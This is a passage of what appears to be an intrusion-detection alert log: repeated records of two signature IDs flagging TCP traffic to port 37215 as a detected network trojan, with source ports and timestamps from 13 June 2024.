              SID:2829579
              Source Port:51146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.789773
              SID:2835222
              Source Port:53728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630587
              SID:2835222
              Source Port:42246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106734
              SID:2835222
              Source Port:39248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308037
              SID:2829579
              Source Port:34346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912576
              SID:2835222
              Source Port:59048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213105
              SID:2835222
              Source Port:45602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613383
              SID:2835222
              Source Port:60776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106427
              SID:2835222
              Source Port:34666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887152
              SID:2835222
              Source Port:59762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843739
              SID:2835222
              Source Port:56808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213937
              SID:2835222
              Source Port:58066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165891
              SID:2835222
              Source Port:42848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.339019
              SID:2829579
              Source Port:57536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155040
              SID:2835222
              Source Port:53914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422352
              SID:2835222
              Source Port:49218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990572
              SID:2829579
              Source Port:45402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272402
              SID:2835222
              Source Port:38816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156519
              SID:2829579
              Source Port:48576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676438
              SID:2829579
              Source Port:43144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378433
              SID:2835222
              Source Port:36218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154207
              SID:2829579
              Source Port:51796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509353
              SID:2829579
              Source Port:48928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553736
              SID:2835222
              Source Port:39962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439249
              SID:2835222
              Source Port:56266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695071
              SID:2835222
              Source Port:46228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256576
              SID:2829579
              Source Port:43574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075395
              SID:2835222
              Source Port:50872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710737
              SID:2835222
              Source Port:39980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301690
              SID:2829579
              Source Port:49344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613040
              SID:2835222
              Source Port:55178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992459
              SID:2835222
              Source Port:55456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487158
              SID:2829579
              Source Port:43918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130641
              SID:2835222
              Source Port:51032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524433
              SID:2835222
              Source Port:37160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835673
              SID:2829579
              Source Port:38458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568044
              SID:2835222
              Source Port:42166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526199
              SID:2829579
              Source Port:48590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439514
              SID:2835222
              Source Port:41174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937201
              SID:2829579
              Source Port:54880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995205
              SID:2829579
              Source Port:38236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567110
              SID:2829579
              Source Port:53758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544880
              SID:2835222
              Source Port:53406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174527
              SID:2835222
              Source Port:58158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455834
              SID:2829579
              Source Port:48332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089857
              SID:2835222
              Source Port:46242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375559
              SID:2829579
              Source Port:59564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452980
              SID:2829579
              Source Port:49208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824305
              SID:2835222
              Source Port:36642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212861
              SID:2829579
              Source Port:51180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247429
              SID:2835222
              Source Port:52494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196114
              SID:2835222
              Source Port:52662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416217
              SID:2835222
              Source Port:56182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011690
              SID:2829579
              Source Port:56962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092573
              SID:2829579
              Source Port:47366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868922
              SID:2829579
              Source Port:47578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100366
              SID:2835222
              Source Port:52544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756479
              SID:2829579
              Source Port:35864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248085
              SID:2829579
              Source Port:44922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253913
              SID:2829579
              Source Port:38742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199515
              SID:2835222
              Source Port:54074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885014
              SID:2835222
              Source Port:39308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195157
              SID:2835222
              Source Port:46130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727419
              SID:2835222
              Source Port:36612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040813
              SID:2835222
              Source Port:34422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090542
              SID:2835222
              Source Port:43360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302848
              SID:2829579
              Source Port:36300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909296
              SID:2835222
              Source Port:37452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572924
              SID:2829579
              Source Port:59282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213816
              SID:2835222
              Source Port:40222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269415
              SID:2829579
              Source Port:42646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248105
              SID:2835222
              Source Port:41300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044008
              SID:2835222
              Source Port:55054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913292
              SID:2835222
              Source Port:48036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754555
              SID:2829579
              Source Port:43584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159874
              SID:2835222
              Source Port:57702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696720
              SID:2835222
              Source Port:37070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299151
              SID:2829579
              Source Port:51138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099779
              SID:2829579
              Source Port:33092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306868
              SID:2829579
              Source Port:50800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403912
              SID:2829579
              Source Port:60298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821177
              SID:2829579
              Source Port:58056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632543
              SID:2835222
              Source Port:47982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913915
              SID:2829579
              Source Port:56494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231998
              SID:2835222
              Source Port:59502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175776
              SID:2829579
              Source Port:55566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697202
              SID:2829579
              Source Port:42118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869817
              SID:2835222
              Source Port:38718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831365
              SID:2829579
              Source Port:39198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547196
              SID:2829579
              Source Port:38868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478174
              SID:2835222
              Source Port:48826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612411
              SID:2835222
              Source Port:43258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135882
              SID:2835222
              Source Port:47372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166920
              SID:2829579
              Source Port:51786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694419
              SID:2835222
              Source Port:58590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503752
              SID:2829579
              Source Port:42536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486941
              SID:2829579
              Source Port:49872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804958
              SID:2835222
              Source Port:37666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824220
              SID:2829579
              Source Port:37840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303950
              SID:2829579
              Source Port:53586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.058705
              SID:2829579
              Source Port:57844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710810
              SID:2835222
              Source Port:38152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.029032
              SID:2829579
              Source Port:51086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014690
              SID:2835222
              Source Port:37592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728443
              SID:2835222
              Source Port:55348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245846
              SID:2835222
              Source Port:60702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137874
              SID:2829579
              Source Port:44128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.953850
              SID:2829579
              Source Port:52502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.196562
              SID:2829579
              Source Port:38734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358915
              SID:2829579
              Source Port:34360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111834
              SID:2835222
              Source Port:56034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373151
              SID:2829579
              Source Port:47490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044815
              SID:2835222
              Source Port:37540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.371870
              SID:2835222
              Source Port:43984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710210
              SID:2835222
              Source Port:35436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969166
              SID:2829579
              Source Port:51244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305015
              SID:2829579
              Source Port:60970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127085
              SID:2829579
              Source Port:49930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026696
              SID:2829579
              Source Port:35446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709870
              SID:2829579
              Source Port:47456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756316
              SID:2829579
              Source Port:35034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213640
              SID:2829579
              Source Port:34816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502580
              SID:2829579
              Source Port:43564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106950
              SID:2829579
              Source Port:47694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456477
              SID:2835222
              Source Port:46660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028240
              SID:2829579
              Source Port:45018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478081
              SID:2835222
              Source Port:51048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509997
              SID:2829579
              Source Port:53530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056917
              SID:2829579
              Source Port:35706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450544
              SID:2835222
              Source Port:33740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404009
              SID:2835222
              Source Port:40262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343845
              SID:2835222
              Source Port:53516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488358
              SID:2835222
              Source Port:44184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868638
              SID:2835222
              Source Port:46100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888691
              SID:2835222
              Source Port:41530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358781
              SID:2829579
              Source Port:35826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501645
              SID:2835222
              Source Port:53368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570402
              SID:2829579
              Source Port:33982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731196
              SID:2835222
              Source Port:55374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078864
              SID:2829579
              Source Port:45354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727429
              SID:2835222
              Source Port:33418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048639
              SID:2829579
              Source Port:38988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.570422
              SID:2829579
              Source Port:37792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659903
              SID:2829579
              Source Port:43878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.037930
              SID:2829579
              Source Port:44398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730554
              SID:2829579
              Source Port:44234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755837
              SID:2835222
              Source Port:49520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155169
              SID:2829579
              Source Port:54094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245438
              SID:2835222
              Source Port:48656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676382
              SID:2835222
              Source Port:58434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077513
              SID:2829579
              Source Port:53246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911342
              SID:2835222
              Source Port:38928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086705
              SID:2829579
              Source Port:57942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707307
              SID:2829579
              Source Port:42912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572116
              SID:2835222
              Source Port:40876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474023
              SID:2829579
              Source Port:36140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176712
              SID:2829579
              Source Port:38628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820444
              SID:2829579
              Source Port:54566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275343
              SID:2829579
              Source Port:39412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.237950
              SID:2835222
              Source Port:38824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403418
              SID:2829579
              Source Port:39486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109270
              SID:2835222
              Source Port:53970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298047
              SID:2835222
              Source Port:45002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805437
              SID:2835222
              Source Port:43798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193512
              SID:2835222
              Source Port:49178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440260
              SID:2835222
              Source Port:40624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504046
              SID:2829579
              Source Port:46818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.549510
              SID:2835222
              Source Port:59602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.780209
              SID:2835222
              Source Port:36430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268018
              SID:2835222
              Source Port:53470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508020
              SID:2835222
              Source Port:44866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439544
              SID:2835222
              Source Port:37264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277085
              SID:2829579
              Source Port:41070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711900
              SID:2835222
              Source Port:45156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991362
              SID:2829579
              Source Port:44156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403481
              SID:2829579
              Source Port:41924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173854
              SID:2829579
              Source Port:35408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836844
              SID:2829579
              Source Port:58274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246797
              SID:2835222
              Source Port:59184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317763
              SID:2829579
              Source Port:52594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503987
              SID:2835222
              Source Port:48900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996353
              SID:2829579
              Source Port:42724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870192
              SID:2829579
              Source Port:55440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757151
              SID:2835222
              Source Port:40838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.113754
              SID:2835222
              Source Port:55016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090152
              SID:2835222
              Source Port:56444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940520
              SID:2835222
              Source Port:59250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094417
              SID:2829579
              Source Port:39710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227850
              SID:2835222
              Source Port:50840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304491
              SID:2829579
              Source Port:52004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277976
              SID:2835222
              Source Port:42156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.172859
              SID:2835222
              Source Port:43220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729634
              SID:2829579
              Source Port:35888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708960
              SID:2829579
              Source Port:35006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835477
              SID:2835222
              Source Port:54310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546690
              SID:2835222
              Source Port:48916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604740
              SID:2835222
              Source Port:58188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231044
              SID:2835222
              Source Port:45672
              Destination Port:37215
